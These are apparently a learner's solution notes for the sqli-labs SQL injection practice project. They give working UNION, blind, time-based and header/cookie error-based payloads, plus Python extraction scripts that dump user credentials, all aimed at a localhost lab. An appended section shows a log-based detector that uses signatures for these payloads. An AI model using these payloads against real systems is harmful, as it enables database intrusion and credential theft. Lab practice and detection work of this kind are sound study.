
sqli-labs solution notes

I have recently been organising my skill tree and, while at it, going back over things I learned earlier. SQL injection is the first topic.

sqli-labs is a SQL injection practice project on GitHub. It is very basic and well suited to beginners; since I am tidying up my notes anyway, working through it is a good way to consolidate the fundamentals.

Part 1 (basic)
Less1

The most basic UNION-based injection.
Find the number of columns:
http://localhost/sqli-labs/Less-1/?id=-1' order by 3%23
Get the database name:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,database()%20%23
Get the table names (the page applies a LIMIT, so group_concat is used to return them all in one row):
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22%23
Get the column names:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%22users%22%23
Get the data:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20users%23

Less2
id is numeric, so nothing needs to be closed; just leave out the single quote.

Less3
id has to be closed with a single quote and a right parenthesis.

Less4
id has to be closed with a double quote and a right parenthesis.

Less5
Same as before, but when the SQL statement is correct the page only shows "You are in…".
Blind injection based on whether the page reports an error:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author : lockcy
import requests

url = 'http://localhost/sqli-labs/Less-5/?id=1\''
r = requests.Session()
result = ''
for i in range(1, 10):            # character position
    for j in range(37, 128):      # candidate ASCII codes for that position
        # user name
        # payload = " and ord(mid(user(),{0},1))={1}%23".format(str(i), str(j))
        # database
        # payload = " and ord(mid(database(),{0},1))={1}%23".format(str(i), str(j))
        # table name
        # payload = " and ord(mid((select table_name from information_schema.tables where table_schema=\'security\' limit 0,1),{0},1))={1}%23".format(str(i), str(j))
        # column name
        # payload = " and ord(mid((select column_name from information_schema.columns where table_name=\'users\' limit 0,1),{0},1))={1}%23".format(str(i), str(j))
        # data
        payload = " and ord(mid((select group_concat(username,0x3a,password) from users limit 0,1),{0},1))={1}%23".format(str(i), str(j))
        payload = url + payload
        print(payload)
        html = r.get(payload)
        if "You are in" in html.text:   # the page only says this when the condition held
            result += chr(j)
            print(result)
            break
print(result)

Less6
Basically the same as Less 5, but closing with a single quote is not needed.

Less7
Basically the same as Less 5; close with a single quote and two right parentheses.

Less8
Basically the same as Less 5, except that errors are not echoed; the check used for Less 5 still works.

Less9
The response is identical whether or not the SQL statement is correct, so MySQL's time-related functions (sleep, benchmark) can be used for time-based injection.
The Less 5 script only needs a small change.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author : lockcy
import requests
import time

url = 'http://localhost/sqli-labs/Less-9/?id=1\''
r = requests.Session()
result = ''
for i in range(1, 10):
    for j in range(37, 128):
        time1 = time.time()
        payload = " and ord(mid(user(),{0},1))={1} and sleep(3)%23".format(str(i), str(j))
        # payload = " and ord(mid(database(),{0},1))={1} and sleep(3)%23".format(str(i), str(j))
        # payload = " and ord(mid((select table_name from information_schema.tables where table_schema=\'security\' limit 0,1),{0},1))={1} and sleep(3)%23".format(str(i), str(j))
        # payload = " and ord(mid((select column_name from information_schema.columns where table_name=\'users\' limit 0,1),{0},1))={1} and sleep(3)%23".format(str(i), str(j))
        # payload = " and ord(mid((select group_concat(username,0x3a,password) from users limit 0,1),{0},1))={1} and sleep(3)%23".format(str(i), str(j))
        payload = url + payload
        print(payload)
        html = r.get(payload, timeout=5)
        time2 = time.time()
        if time2 - time1 > 3:   # sleep(3) fired, so the condition held
            result += chr(j)
            print(result)
            break
print(result)

Less10
The same again, so I will not repeat it; the levels of the same type below are covered only briefly.

Less11 Less12 Less13 Less14
Injection in the POST login form; the principle is unchanged. Less 11 serves as the example.

Less15 Less16
No echo at all, so time-based blind injection; the Less 9 script just needs to be changed to POST.

Less17

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author : lockcy
import requests
import time

url = 'http://localhost/sqli-labs/Less-17/'
r = requests.Session()
result = ''
for i in range(1, 10):
    for j in range(110, 128):
        time1 = time.time()
        # The payload is sent in a POST form field, which requests form-encodes, so the
        # comment marker has to be a literal '#' here rather than the URL-encoded %23
        payload = '1\' where username=\'admin\' and if(ascii(substr(user(),{0},1))={1},sleep(4),1)#'.format(str(i), str(j))
        print(payload)
        data = {'username': 'admin', 'password': payload}
        html = r.post(url=url, data=data, timeout=20)
        time2 = time.time()
        if time2 - time1 > 3:   # sleep(4) fired, so the condition held
            result += chr(j)
            print(result)
            break
print(result)

Less18
Both password and username are filtered, so they cannot be injected, but the IP address and User-Agent are INSERTed into a table, so error-based injection through the User-Agent header is the option to consider.
User-Agent: 1' or updatexml(1,concat('#',(database())),0),',')#

Less19
Similar to Less 18, but the injection goes in the Referer header. Note that the POSTed username and password must exist in the database, otherwise no error message is echoed.

Less20
Cookie injection; the injection point is $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
After logging in successfully, modify the cookie:
Cookie: uname=admin' and extractvalue(1,concat(0x3a,(select database()),0x3a))#;

Note that error-based injection is still required here, because the injection only succeeds when admin has logged in and the cookie exists.

Less21
Same as the previous level, except the closing gains a right parenthesis and the value must be base64-encoded.

Less22
Same as Less 20, except the closing is a double quote and the value must be base64-encoded.
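Seen from the operations side, every payload in these notes leaves a recognisable trace in the web server log: the URL-based UNION and blind probes of Less 1 to 9, the User-Agent and Referer error-based probes of Less 18 and 19, and the cookie probes of Less 20 to 22 (base64-wrapped in Less 21 and 22). The detector below is an added example, not part of the original post or of sqli-labs. It parses combined-format log lines extended with a cookie field, URL-decodes the request path and Referer, attempts a base64 decode of each cookie value, and matches the three payload families seen in this series against simple signatures. The log lines, the IP address and the exact log layout are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Apache "combined" format plus a trailing quoted cookie field (constructed layout)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# Signatures for the three payload families that appear in the sqli-labs levels above.
# They are matched against lower-cased, URL-decoded text.
SIGNATURES = {
    "union-based": re.compile(r"\bunion\b.*\bselect\b|information_schema|group_concat\s*\("),
    "blind (boolean/time)": re.compile(
        r"\bsleep\s*\(|\bbenchmark\s*\(|\b(?:ord|ascii)\s*\(\s*(?:mid|substr)\s*\("),
    "error-based": re.compile(r"\bupdatexml\s*\(|\bextractvalue\s*\("),
}


def _maybe_b64(value):
    """Return the decoded text if `value` is well-formed base64, else an empty string."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "ignore")
    except (binascii.Error, ValueError):
        return ""


def scan_line(line):
    """Return a list of (field, family) findings for one log line; [] if clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return []            # a real pipeline would count unparseable lines separately
    fields = {
        "path": unquote_plus(m["path"]),
        "referer": unquote_plus(m["referer"]),
        "user_agent": m["ua"],
    }
    if m["cookie"] != "-":
        for pair in m["cookie"].split(";"):
            name, _, value = pair.strip().partition("=")
            if not name or not value:
                continue
            fields["cookie:" + name] = unquote_plus(value)
            decoded = _maybe_b64(value)      # Less 21/22 wrap the payload in base64
            if decoded:
                fields["cookie:" + name + "(base64)"] = decoded
    findings = []
    for field, text in fields.items():
        low = text.lower()
        for family, pattern in SIGNATURES.items():
            if pattern.search(low):
                findings.append((field, family))
    return findings


def scan_lines(lines):
    """Return (line_index, field, family) for every finding across a batch of lines."""
    return [(idx, field, family)
            for idx, line in enumerate(lines)
            for field, family in scan_line(line)]


def _log(method, path, referer="-", ua="Mozilla/5.0", cookie="-"):
    # Helper that builds one constructed log line in the layout LOG_RE expects
    return ('10.0.0.5 - - [10/Oct/2023:13:55:36 +0800] "%s %s HTTP/1.1" 200 512 "%s" "%s" "%s"'
            % (method, path, referer, ua, cookie))


# Constructed sample traffic: one benign request followed by one request per payload family
LOG_LINES = [
    _log("GET", "/sqli-labs/Less-1/?id=1"),
    _log("GET", "/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,database()%20%23"),
    _log("GET", "/sqli-labs/Less-9/?id=1%27%20and%20ord(mid(user(),1,1))=114%20and%20sleep(3)%23"),
    _log("POST", "/sqli-labs/Less-18/", ua="1' or updatexml(1,concat('#',(database())),0),',')#"),
    _log("GET", "/sqli-labs/Less-21/", cookie="uname=" + base64.b64encode(
        b"admin') and extractvalue(1,concat(0x3a,(select database()),0x3a))#").decode()),
]

if __name__ == "__main__":
    for idx, field, family in scan_lines(LOG_LINES):
        print("line %d: %-22s in %s" % (idx, family, field))
```

These signatures only catch the textbook forms used in the lab; case changes are handled by lower-casing, but hex or `char()` encodings, inline comments and other obfuscation will slip past them, so treat the output as triage input rather than a control. The durable fix is on the application side (bound parameters for the id, the login fields, the header values and the cookie alike); the log scan is there to tell you which endpoints are being probed and when.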